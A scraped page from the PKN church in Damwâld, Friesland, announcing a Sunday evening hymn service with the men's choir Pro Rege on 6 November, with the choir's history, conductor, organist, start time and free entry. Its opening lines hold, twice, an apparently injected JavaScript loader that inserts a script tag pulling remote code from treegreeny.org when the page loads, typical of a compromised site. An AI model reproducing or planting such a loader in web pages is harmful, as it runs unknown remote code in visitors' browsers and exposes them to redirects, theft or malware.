;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zondagavondzang met Pro Rege - PKN Damwâld

Zondagavondzang met Pro Rege

Gepubliceerd op: dinsdag 25 oktober 2022

Zondagavond 6 november a.s. is er een zondagavondzang in de PKN Kerk “De Ontmoeting’’, Foarwei 48 te Damwâld met Christelijk Mannenkoor Pro Rege.

Mannenkoor Pro Rege is opgericht in 1965. Het koor is interkerkelijk en geniet in Friesland goede bekendheid. De ruim 80 koorleden komen uit Dokkum en wijde regio. Pro Rege staat onder leiding van de bekende dirigent Jan Hibma, die meerdere mannenkoren dirigeert, o.a. Edoza te Sneek en Westerlauwers te Buitenpost.

Pro Rege betekent ‘Voor de Koning’. Voor deze avond geldt dan ook om door koorzang, afgewisseld met samenzang, bij te dragen aan de verkondiging van het Evangelie. Het geheel wordt muzikaal omlijst door Anja Heikamp-Kommerie op het orgel. Wij hopen op een gezegende avond en een volle kerk. Iedereen is van harte welkom. Het programma begint om 19.30 uur. De toegang is vrij, wel is er een collecte.